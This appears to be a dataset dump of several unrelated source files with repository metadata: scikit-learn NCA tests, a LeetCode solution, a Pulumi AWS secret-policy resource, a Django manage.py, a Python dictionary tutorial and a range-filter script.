"""Test gradient of loss function
Assert that the gradient is almost equal to its finite differences
approximation.
"""
# Initialize the transformation `M`, as well as `X` and `y` and `NCA`
rng = np.random.RandomState(42)
X, y = make_classification()
M = rng.randn(rng.randint(1, X.shape[1] + 1),
X.shape[1])
nca = NeighborhoodComponentsAnalysis()
nca.n_iter_ = 0
mask = y[:, np.newaxis] == y[np.newaxis, :]
def fun(M):
return nca._loss_grad_lbfgs(M, X, mask)[0]
def grad(M):
return nca._loss_grad_lbfgs(M, X, mask)[1]
# compute relative error
rel_diff = check_grad(fun, grad, M.ravel()) / np.linalg.norm(grad(M))
np.testing.assert_almost_equal(rel_diff, 0., decimal=5)
def test_params_validation():
# Test that invalid parameters raise value error
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
NCA = NeighborhoodComponentsAnalysis
rng = np.random.RandomState(42)
# TypeError
assert_raises(TypeError, NCA(max_iter='21').fit, X, y)
assert_raises(TypeError, NCA(verbose='true').fit, X, y)
assert_raises(TypeError, NCA(tol='1').fit, X, y)
assert_raises(TypeError, NCA(n_components='invalid').fit, X, y)
assert_raises(TypeError, NCA(warm_start=1).fit, X, y)
# ValueError
assert_raise_message(ValueError,
"`init` must be 'auto', 'pca', 'lda', 'identity', "
"'random' or a numpy array of shape "
"(n_components, n_features).",
NCA(init=1).fit, X, y)
assert_raise_message(ValueError,
'`max_iter`= -1, must be >= 1.',
NCA(max_iter=-1).fit, X, y)
init = rng.rand(5, 3)
assert_raise_message(ValueError,
'The output dimensionality ({}) of the given linear '
'transformation `init` cannot be greater than its '
'input dimensionality ({}).'
.format(init.shape[0], init.shape[1]),
NCA(init=init).fit, X, y)
n_components = 10
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) cannot '
'be greater than the given data '
'dimensionality ({})!'
.format(n_components, X.shape[1]),
NCA(n_components=n_components).fit, X, y)
def test_transformation_dimensions():
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
# Fail if transformation input dimension does not match inputs dimensions
transformation = np.array([[1, 2], [3, 4]])
assert_raises(ValueError,
NeighborhoodComponentsAnalysis(init=transformation).fit,
X, y)
# Fail if transformation output dimension is larger than
# transformation input dimension
transformation = np.array([[1, 2], [3, 4], [5, 6]])
# len(transformation) > len(transformation[0])
assert_raises(ValueError,
NeighborhoodComponentsAnalysis(init=transformation).fit,
X, y)
# Pass otherwise
transformation = np.arange(9).reshape(3, 3)
NeighborhoodComponentsAnalysis(init=transformation).fit(X, y)
def test_n_components():
rng = np.random.RandomState(42)
X = np.arange(12).reshape(4, 3)
y = [1, 1, 2, 2]
init = rng.rand(X.shape[1] - 1, 3)
# n_components = X.shape[1] != transformation.shape[0]
n_components = X.shape[1]
nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(n_components, init.shape[0]),
nca.fit, X, y)
# n_components > X.shape[1]
n_components = X.shape[1] + 2
nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) cannot '
'be greater than the given data '
'dimensionality ({})!'
.format(n_components, X.shape[1]),
nca.fit, X, y)
# n_components < X.shape[1]
nca = NeighborhoodComponentsAnalysis(n_components=2, init='identity')
nca.fit(X, y)
def test_init_transformation():
rng = np.random.RandomState(42)
X, y = make_blobs(n_samples=30, centers=6, n_features=5, random_state=0)
# Start learning from scratch
nca = NeighborhoodComponentsAnalysis(init='identity')
nca.fit(X, y)
# Initialize with random
nca_random = NeighborhoodComponentsAnalysis(init='random')
nca_random.fit(X, y)
# Initialize with auto
nca_auto = NeighborhoodComponentsAnalysis(init='auto')
nca_auto.fit(X, y)
# Initialize with PCA
nca_pca = NeighborhoodComponentsAnalysis(init='pca')
nca_pca.fit(X, y)
# Initialize with LDA
nca_lda = NeighborhoodComponentsAnalysis(init='lda')
nca_lda.fit(X, y)
init = rng.rand(X.shape[1], X.shape[1])
nca = NeighborhoodComponentsAnalysis(init=init)
nca.fit(X, y)
# init.shape[1] must match X.shape[1]
init = rng.rand(X.shape[1], X.shape[1] + 1)
nca = NeighborhoodComponentsAnalysis(init=init)
assert_raise_message(ValueError,
'The input dimensionality ({}) of the given '
'linear transformation `init` must match the '
'dimensionality of the given inputs `X` ({}).'
.format(init.shape[1], X.shape[1]),
nca.fit, X, y)
# init.shape[0] must be <= init.shape[1]
init = rng.rand(X.shape[1] + 1, X.shape[1])
nca = NeighborhoodComponentsAnalysis(init=init)
assert_raise_message(ValueError,
'The output dimensionality ({}) of the given '
'linear transformation `init` cannot be '
'greater than its input dimensionality ({}).'
.format(init.shape[0], init.shape[1]),
nca.fit, X, y)
# init.shape[0] must match n_components
init = rng.rand(X.shape[1], X.shape[1])
n_components = X.shape[1] - 2
nca = NeighborhoodComponentsAnalysis(init=init, n_components=n_components)
assert_raise_message(ValueError,
'The preferred dimensionality of the '
'projected space `n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(n_components, init.shape[0]),
nca.fit, X, y)
@pytest.mark.parametrize('n_samples', [3, 5, 7, 11])
@pytest.mark.parametrize('n_features', [3, 5, 7, 11])
@pytest.mark.parametrize('n_classes', [5, 7, 11])
@pytest.mark.parametrize('n_components', [3, 5, 7, 11])
def test_auto_init(n_samples, n_features, n_classes, n_components):
# Test that auto choose the init as expected with every configuration
# of order of n_samples, n_features, n_classes and n_components.
rng = np.random.RandomState(42)
nca_base = NeighborhoodComponentsAnalysis(init='auto',
n_components=n_components,
max_iter=1,
random_state=rng)
if n_classes >= n_samples:
pass
# n_classes > n_samples is impossible, and n_classes == n_samples
# throws an error from lda but is an absurd case
else:
X = rng.randn(n_samples, n_features)
y = np.tile(range(n_classes), n_samples // n_classes + 1)[:n_samples]
if n_components > n_features:
# this would return a ValueError, which is already tested in
# test_params_validation
pass
else:
nca = clone(nca_base)
nca.fit(X, y)
if n_components <= min(n_classes - 1, n_features):
nca_other = clone(nca_base).set_params(init='lda')
elif n_components < min(n_features, n_samples):
nca_other = clone(nca_base).set_params(init='pca')
else:
nca_other = clone(nca_base).set_params(init='identity')
nca_other.fit(X, y)
assert_array_almost_equal(nca.components_, nca_other.components_)
def test_warm_start_validation():
X, y = make_classification(n_samples=30, n_features=5, n_classes=4,
n_redundant=0, n_informative=5, random_state=0)
nca = NeighborhoodComponentsAnalysis(warm_start=True, max_iter=5)
nca.fit(X, y)
X_less_features, y = make_classification(n_samples=30, n_features=4,
n_classes=4, n_redundant=0,
n_informative=4, random_state=0)
assert_raise_message(ValueError,
'The new inputs dimensionality ({}) does not '
'match the input dimensionality of the '
'previously learned transformation ({}).'
.format(X_less_features.shape[1],
nca.components_.shape[1]),
nca.fit, X_less_features, y)
def test_warm_start_effectiveness():
# A 1-iteration second fit on same data should give almost same result
# with warm starting, and quite different result without warm starting.
nca_warm = NeighborhoodComponentsAnalysis(warm_start=True, random_state=0)
nca_warm.fit(iris_data, iris_target)
transformation_warm = nca_warm.components_
nca_warm.max_iter = 1
nca_warm.fit(iris_data, iris_target)
transformation_warm_plus_one = nca_warm.components_
nca_cold = NeighborhoodComponentsAnalysis(warm_start=False, random_state=0)
nca_cold.fit(iris_data, iris_target)
transformation_cold = nca_cold.components_
nca_cold.max_iter = 1
nca_cold.fit(iris_data, iris_target)
transformation_cold_plus_one = nca_cold.components_
diff_warm = np.sum(np.abs(transformation_warm_plus_one -
transformation_warm))
diff_cold = np.sum(np.abs(transformation_cold_plus_one -
transformation_cold))
assert diff_warm < 3.0, ("Transformer changed significantly after one "
"iteration even though it was warm-started.")
assert diff_cold > diff_warm, ("Cold-started transformer changed less "
"significantly than warm-started "
"transformer after one iteration.")
@pytest.mark.parametrize('init_name', ['pca', 'lda', 'identity', 'random',
'precomputed'])
def test_verbose(init_name, capsys):
# assert there is proper output when verbose = 1, for every initialization
# except auto because auto will call one of the others
rng = np.random.RandomState(42)
X, y = make_blobs(n_samples=30, centers=6, n_features=5, random_state=0)
regexp_init = r'... done in \ *\d+\.\d{2}s'
msgs = {'pca': "Finding principal components" + regexp_init,
'lda': "Finding most discriminative components" + regexp_init}
if init_name == 'precomputed':
init = rng.randn(X.shape[1], X.shape[1])
else:
init = init_name
nca = NeighborhoodComponentsAnalysis(verbose=1, init=init)
nca.fit(X, y)
out, _ = capsys.readouterr()
# check output
lines = re.split('\n+', out)
# if pca or lda init, an additional line is printed, so we test
# it and remove it to test the rest equally among initializations
if init_name in ['pca', 'lda']:
assert re.match(msgs[init_name], lines[0])
lines = lines[1:]
assert lines[0] == '[NeighborhoodComponentsAnalysis]'
header = '{:>10} {:>20} {:>10}'.format('Iteration', 'Objective Value',
'Time(s)')
assert lines[1] == '[NeighborhoodComponentsAnalysis] {}'.format(header)
assert lines[2] == ('[NeighborhoodComponentsAnalysis] {}'
.format('-' * len(header)))
for line in lines[3:-2]:
# The following regex will match for instance:
# '[NeighborhoodComponentsAnalysis] 0 6.988936e+01 0.01'
assert re.match(r'\[NeighborhoodComponentsAnalysis\] *\d+ *\d\.\d{6}e'
r'[+|-]\d+\ *\d+\.\d{2}', line)
assert re.match(r'\[NeighborhoodComponentsAnalysis\] Training took\ *'
r'\d+\.\d{2}s\.', lines[-2])
assert lines[-1] == ''
def test_no_verbose(capsys):
# assert by default there is no output (verbose=0)
nca = NeighborhoodComponentsAnalysis()
nca.fit(iris_data, iris_target)
out, _ = capsys.readouterr()
# check output
assert(out == '')
def test_singleton_class():
X = iris_data
y = iris_target
# one singleton class
singleton_class = 1
ind_singleton, = np.where(y == singleton_class)
y[ind_singleton] = 2
y[ind_singleton[0]] = singleton_class
nca = NeighborhoodComponentsAnalysis(max_iter=30)
nca.fit(X, y)
# One non-singleton class
ind_1, = np.where(y == 1)
ind_2, = np.where(y == 2)
y[ind_1] = 0
y[ind_1[0]] = 1
y[ind_2] = 0
y[ind_2[0]] = 2
nca = NeighborhoodComponentsAnalysis(max_iter=30)
nca.fit(X, y)
# Only singleton classes
ind_0, = np.where(y == 0)
ind_1, = np.where(y == 1)
ind_2, = np.where(y == 2)
X = X[[ind_0[0], ind_1[0], ind_2[0]]]
y = y[[ind_0[0], ind_1[0], ind_2[0]]]
nca = NeighborhoodComponentsAnalysis(init='identity', max_iter=30)
nca.fit(X, y)
assert_array_equal(X, nca.transform(X))
def test_one_class():
X = iris_data[iris_target == 0]
y = iris_target[iris_target == 0]
nca = NeighborhoodComponentsAnalysis(max_iter=30,
n_components=X.shape[1],
init='identity')
nca.fit(X, y)
assert_array_equal(X, nca.transform(X))
def test_callback(capsys):
X = iris_data
y = iris_target
nca = NeighborhoodComponentsAnalysis(callback='my_cb')
assert_raises(ValueError, nca.fit, X, y)
max_iter = 10
def my_cb(transformation, n_iter):
assert transformation.shape == (iris_data.shape[1]**2,)
rem_iter = max_iter - n_iter
print('{} iterations remaining...'.format(rem_iter))
# assert that my_cb is called
nca = NeighborhoodComponentsAnalysis(max_iter=max_iter,
callback=my_cb, verbose=1)
nca.fit(iris_data, iris_target)
out, _ = capsys.readouterr()
# check output
assert('{} iterations remaining...'.format(max_iter - 1) in out)
def test_expected_transformation_shape():
"""Test that the transformation has the expected shape."""
X = iris_data
y = iris_target
class TransformationStorer:
def __init__(self, X, y):
# Initialize a fake NCA and variables needed to call the loss
# function:
self.fake_nca = NeighborhoodComponentsAnalysis()
self.fake_nca.n_iter_ = np.inf
self.X, y, _ = self.fake_nca._validate_params(X, y)
self.same_class_mask = y[:, np.newaxis] == y[np.newaxis, :]
def callback(self, transformation, n_iter):
"""Stores the last value of the transformation taken as input by
the optimizer"""
self.transformation = transformation
transformation_storer = TransformationStorer(X, y)
cb = transformation_storer.callback
nca = NeighborhoodComponentsAnalysis(max_iter=5, callback=cb)
nca.fit(X, y)
assert transformation_storer.transformation.size == X.shape[1]**2
def test_convergence_warning():
nca = NeighborhoodComponentsAnalysis(max_iter=2, verbose=1)
cls_name = nca.__class__.__name__
assert_warns_message(ConvergenceWarning,
'[{}] NCA did not converge'.format(cls_name),
nca.fit, iris_data, iris_target)
@pytest.mark.parametrize('param, value', [('n_components', np.int32(3)),
('max_iter', np.int32(100)),
('tol', np.float32(0.0001))])
def test_parameters_valid_types(param, value):
# check that no error is raised when parameters have numpy integer or
# floating types.
nca = NeighborhoodComponentsAnalysis(**{param: value})
X = iris_data
y = iris_target
nca.fit(X, y)
| [
"[email protected]"
] | |
8f06edb067427872d40d29ef97e33cffafcc5c31 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode-Minimum Area Rectangle.py | bac5a430a77fc7b720b63b147c68a99ab884d1bd | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | from collections import defaultdict
class Solution:
    def minAreaRect(self, points) -> int:
        # Fewer than four points can never form a rectangle.
        if len(points) <= 3:
            return 0
        # Map each x-coordinate to the set of y-coordinates present at that x.
        x = defaultdict(set)
        for xC, yC in points:
            x[xC].add(yC)
        m = float('inf')
        # Brute force over point pairs taken as opposite corners of a candidate
        # axis-aligned rectangle: the pair must differ in both coordinates, and
        # the two remaining corners must exist in the coordinate map.
        for p1 in points:
            for p2 in points:
                if p1[0] == p2[0] or p1[1] == p2[1]:
                    continue
                if p2[1] in x[p1[0]] and p1[1] in x[p2[0]]:
                    t = abs(p1[0] - p2[0]) * abs(p1[1] - p2[1])
                    m = min(t, m)
        return m if m < float('inf') else 0
s = Solution()
print(s.minAreaRect([[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]])) | [
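# --- Added alternative (not part of the original solution): treating each
# unordered pair of points as diagonal corners cuts the work to O(n^2) set
# lookups instead of the O(n^4)-ish scan above.
def min_area_rect_diagonal(points) -> int:
    seen = set(map(tuple, points))
    best = float('inf')
    for i, (x1, y1) in enumerate(points):
        for x2, y2 in points[:i]:
            # Opposite corners must differ on both axes; the other two
            # corners (x1, y2) and (x2, y1) must both be present.
            if x1 != x2 and y1 != y2 and (x1, y2) in seen and (x2, y1) in seen:
                best = min(best, abs(x1 - x2) * abs(y1 - y2))
    return best if best < float('inf') else 0
print(min_area_rect_diagonal([[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]]))  # -> 2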
"[email protected]"
] | |
7a5f37ad2f3ff8cf53a9b3b4ca81d5f74320aa45 | 649078315f93e2d76fad95c59f234701ef055cb8 | /test/test_baseSubscriber.py | 820a50160e7e984fa738df7e2c5d59094e7878bd | [
"MIT"
] | permissive | jaebradley/nba_player_news | 207f4555f662c9187e9ab931774a0863556529f8 | 35ac64c369c33f1232fa76bd5bcc1c0704d868bb | refs/heads/master | 2022-11-22T08:25:08.993567 | 2017-06-14T00:36:52 | 2017-06-14T00:36:52 | 89,762,719 | 2 | 0 | MIT | 2022-11-11T17:00:18 | 2017-04-29T04:06:01 | Python | UTF-8 | Python | false | false | 353 | py | from unittest import TestCase
from nba_player_news.data.subscribers import BaseSubscriber
class TestBaseSubscriber(TestCase):
subscriber = BaseSubscriber(subscription_channel_name="foo")
    def test_process_message_is_not_implemented(self):
        # Pass the callable and its kwargs separately; calling it inline would
        # raise before assertRaises could catch the exception. The test_ prefix
        # is also required for unittest to collect the method.
        self.assertRaises(NotImplementedError, self.subscriber.process_message, message="bar")
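# --- Added sketch (hypothetical subclass, not in the original file): shows
# the contract a concrete subscriber is expected to fulfil.
class EchoSubscriber(BaseSubscriber):
    def process_message(self, message):
        return message

class TestEchoSubscriber(TestCase):
    def test_process_message_returns_message(self):
        subscriber = EchoSubscriber(subscription_channel_name="foo")
        self.assertEqual(subscriber.process_message(message="bar"), "bar")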
| [
"[email protected]"
] | |
793073e51592d4314f06fcc0fcbb400e1d8cd9dd | 6872caaa6c3bb59995627064ed1ab63df403bdf6 | /eyantra_provider/venv/Lib/site-packages/authlib/specs/rfc7523/auth.py | 6d737c5ac49b7c82dd49f815df2b3a207dff03bc | [
"MIT"
] | permissive | Andreaf2395/OpenID-Provider | 3189780631d9057140e233930ace72e9bfc76e58 | cdedd42cc49e6f03e3b2570c03fb1f4a2c83be34 | refs/heads/Sameeksha_Final_Provider | 2023-08-21T16:05:42.864159 | 2020-06-18T18:47:16 | 2020-06-18T18:47:16 | 273,314,708 | 0 | 0 | MIT | 2020-06-18T18:48:34 | 2020-06-18T18:44:29 | Python | UTF-8 | Python | false | false | 71 | py | from authlib.oauth2.rfc7523 import register_session_client_auth_method
| [
"[email protected]"
] | |
07985a4f579fa355a9a7fce78a2516fbf7521d8c | 9b367d3f0930a4dfd5f097273a12265fbb706b31 | /textProjectByAli/manage.py | 6fa59a0390d5eea0b49bb3e98b00ee2c3a0a568b | [] | no_license | AliHassanUOS/Remove-Punctuation-Project | a4988f07c685d5e385a279bd67c8c12df4af5c4d | 652cd09668b3ce61904333feb3a624b1b2c1ed42 | refs/heads/master | 2022-12-18T05:29:52.972379 | 2020-09-21T08:00:13 | 2020-09-21T08:00:13 | 297,268,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'textProjectByAli.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
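# Typical invocations from the project root (standard Django management
# commands; they come from Django itself, not from this file):
#   python manage.py migrate
#   python manage.py runserver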
| [
"[email protected]"
] | |
46dfde8b2041244d6ae133d01572576d6944bc71 | 98f7bb1314330138f0cb9901e764f6da8cd5605b | /5_python基础/3_字典.py | 15720e3b4ac0d7bcd22295c0e97684183fa0bb02 | [] | no_license | 1071183139/biji | c964e197ea0845dbfdd98213743130668770f929 | 02c2e6f69ceb557448b959c44723b4bf498e90c9 | refs/heads/master | 2022-12-17T06:46:27.920479 | 2019-10-26T12:02:54 | 2019-10-26T12:02:54 | 217,701,979 | 0 | 0 | null | 2022-12-07T23:55:02 | 2019-10-26T11:57:28 | Python | UTF-8 | Python | false | false | 2,053 | py | # Access a value by its key
info = {'name': '班长', 'id': 100, 'sex': 'f', 'address': '地球亚洲中国北京'}
# print(info['name'])
# print(info['names'])  # accessing a missing key raises a KeyError
# get: fetch a value with an optional default; no error if the key is missing
# print(info.get('id'))
# print(info.get('ids', 'no such key'))
# Common operations, part 1 (modify, add, delete)
# Modify an element
# new_id = input('Enter a value: ')
# info['id'] = new_id
# print(info)
# Add an element (second example)
# If the key already exists, assignment modifies its value:
# info['id'] = 18
# print(info)
# If the key does not exist, assignment adds a new element:
# info['id'] = 18
# print(info)
# Delete elements (del / clear)
# del info['key'] removes one item; del info deletes the whole dictionary
# del info['name']
print(info)
# del info['pp']  # deleting a missing key raises a KeyError
# print(info)
# del can be written either as "del x" or as "del(x)"
# print(info)  # after del, the dictionary itself no longer exists
# clear empties the dictionary: it still exists, it is just empty
# info.clear()
# print(info)  # {}
# Common operations, part 2 (len, keys, values, items; has_key is Python 2 only)
# len: number of key/value pairs in the dictionary
# print(len(info))
# keys: all the keys of the dictionary
# print(info.keys())
# values: all the values of the dictionary
# print(info.values())
# items: all the (key, value) tuples
# print(info.items())  # [('name', '班长'), ('id', 100), ('sex', 'f'), ('address', '地球亚洲中国北京')]
# in / not in: test whether a key is present in the dictionary
# print('name' in info)
# Iterating over a dictionary
for item in info.items():
    print(item)
for key, value in info.items():
    print(key, value)
# print(type(key), type(value))
# Indexing with a position
chars = ['a', 'b', 'c', 'd', 'f']
chars1 = ('a', 'c', 'v', 'd', 'h')
# i = 0
# for ch in chars:
#     print("%d %s" % (i, ch))
#     i += 1
# enumerate works for both lists and tuples
for i, ch in enumerate(chars1):
    print('%d %s' % (i, ch))
a = (1, 2, 3, 4)
b = ('a', 'b', 'c', 'd')
c = a + b
print(a + b)
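# Extra example (added to the lesson): guard deletions with "in" to avoid the
# KeyError shown above, and build dictionaries with a comprehension.
d = {'id': 100}
key = 'pp'
if key in d:
    del d[key]  # only delete when the key actually exists
squares = {n: n * n for n in range(5)}
print(squares)  # {0: 0, 1: 1, 2: 4, 3: 9, 4: 16}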
| [
"[email protected]"
] | |
fa14b434145cd963ca27a6eef951a8dff89d13d1 | 62bbfb6c50bba16304202aea96d1de4990f95e04 | /dependencies/pulumi_aws/secretsmanager/secret_policy.py | 81618991d5edb3f606dbf67e2ea3567c4dac6497 | [] | no_license | adriell/lambda-autoservico-storagegateway | b40b8717c8de076e61bbd422461c7d624a0d2273 | f6e3dea61b004b73943a5438c658d3f019f106f7 | refs/heads/main | 2023-03-16T14:41:16.821675 | 2021-03-11T03:30:33 | 2021-03-11T03:30:33 | 345,865,704 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,885 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
__all__ = ['SecretPolicy']
class SecretPolicy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a resource to manage AWS Secrets Manager secret policy.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example_secret = aws.secretsmanager.Secret("exampleSecret")
example_secret_policy = aws.secretsmanager.SecretPolicy("exampleSecretPolicy",
secret_arn=example_secret.arn,
policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "EnableAllPermissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
\"\"\")
```
## Import
`aws_secretsmanager_secret_policy` can be imported by using the secret Amazon Resource Name (ARN), e.g.
```sh
$ pulumi import aws:secretsmanager/secretPolicy:SecretPolicy example arn:aws:secretsmanager:us-east-1:123456789012:secret:example-123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['block_public_policy'] = block_public_policy
if policy is None and not opts.urn:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if secret_arn is None and not opts.urn:
raise TypeError("Missing required property 'secret_arn'")
__props__['secret_arn'] = secret_arn
super(SecretPolicy, __self__).__init__(
'aws:secretsmanager/secretPolicy:SecretPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None) -> 'SecretPolicy':
"""
Get an existing SecretPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["block_public_policy"] = block_public_policy
__props__["policy"] = policy
__props__["secret_arn"] = secret_arn
return SecretPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="blockPublicPolicy")
def block_public_policy(self) -> pulumi.Output[Optional[bool]]:
"""
Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
"""
return pulumi.get(self, "block_public_policy")
@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="secretArn")
def secret_arn(self) -> pulumi.Output[str]:
"""
Secret ARN.
"""
return pulumi.get(self, "secret_arn")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
553f3d89c11483b36ae1a20c082db45382ae9e15 | 3b786d3854e830a4b46ee55851ca186becbfa650 | /SystemTesting/pylib/nsx/vsm/edge/edge_sslvpnconfig_schema/edge_sslvpnconfig_layout_configuration_schema.py | 68a4bace81fb3982ea88b3dfde93326a01c98ec6 | [] | no_license | Cloudxtreme/MyProject | d81f8d38684333c22084b88141b712c78b140777 | 5b55817c050b637e2747084290f6206d2e622938 | refs/heads/master | 2021-05-31T10:26:42.951835 | 2015-12-10T09:57:04 | 2015-12-10T09:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 885 | py | import base_schema
class SSLVPNConfigLayoutConfigurationSchema(base_schema.BaseSchema):
_schema_name = "layoutConfiguration"
def __init__(self, py_dict=None):
""" Constructor to create
SSLVPNConfigLayoutConfigurationSchema object
@param py_dict : python dictionary to construct this object
"""
super(SSLVPNConfigLayoutConfigurationSchema, self).__init__()
self.set_data_type('xml')
self.portalTitle = None
self.companyName = None
        self.logoExtention = None  # spelling kept as-is: it must match the XML schema field name
self.logoUri = None
self.logoBackgroundColor = None
self.titleColor = None
self.topFrameColor = None
self.menuBarColor = None
self.rowAlternativeColor = None
self.bodyColor = None
self.rowColor = None
if py_dict is not None:
self.get_object_from_py_dict(py_dict) | [
"[email protected]"
] | |
c47ab8e7d986152e8f436c75f1e649796e2231bb | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/utils/CheckInRange/CheckInRange.py | b984a85c12b190cb26df2a3aebfbf2bf794a9fde | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,555 | py | #!/usr/bin/env python3
"""
Keep/Remove records in range.
@Author: [email protected]
Usage:
CheckInRange.py -r file -c int [-e]
CheckInRange.py -h | --help | -v | --version | -f | --format
Notes:
1. Read content from stdin, and output result to stdout.
2. Column index start from 1.
Options:
-c int Column index for value.
-r file Range file, two columns, range_start range_end.
-e Exclude(Remove) records in defined range, default Include(Keep).
-f --format Show example.
-h --help Show this screen.
-v --version Show version.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
# pip install pyinterval
# https://pyinterval.readthedocs.io/en/latest/install.html
try:
from interval import interval
except:
    sys.stderr.write('ERROR importing package "interval"!\nPlease install it with "pip install pyinterval"!\n')
sys.exit(-1)
def ShowFormat():
print('''
# input
#-----------------
100 10
1000000 20
5000000 20
7000000 3
10000000 30
#range file:
#-----------------
1000000 5000000
# cat in.txt | python3 CheckInRange.py -r range.txt -c 1
#-----------------
1000000 20
5000000 20
cat in.txt | python3 CheckInRange.py -r range.txt -c 1 -e
#-----------------
100 10
7000000 3
10000000 30
''')
if __name__ == '__main__':
args = docopt(__doc__, version='3.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
#
colValue = int(args['-c']) -1
keep = True
if args['-e']:
keep = False
irange = interval()
with open(args['-r'],'r') as inf:
for line in inf:
line = line.strip()
if line:
ss = line.split()
irange = irange | interval[float(ss[0]), float(ss[1])]
#-------------------------------------------------
for line in sys.stdin:
line = line.strip()
if line:
ss = line.split()
try:
                v = float(ss[colValue])  # accept integer or float values in column -c
if keep:
if v in irange:
sys.stdout.write('%s\n'%(line))
else:
if not (v in irange):
sys.stdout.write('%s\n'%(line))
except ValueError:
sys.stderr.write('WARN: parse value error(skiped): %s\n'%(line))
sys.stdout.flush()
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
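# Minimal sketch of the membership test used above (kept as a comment so the
# streaming script is unchanged; assumes the same "pyinterval" package):
#
#   from interval import interval
#   r = interval[1000000, 5000000] | interval[7000000, 8000000]
#   assert 1000000 in r and 6000000 not in r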
| [
"[email protected]"
] | |
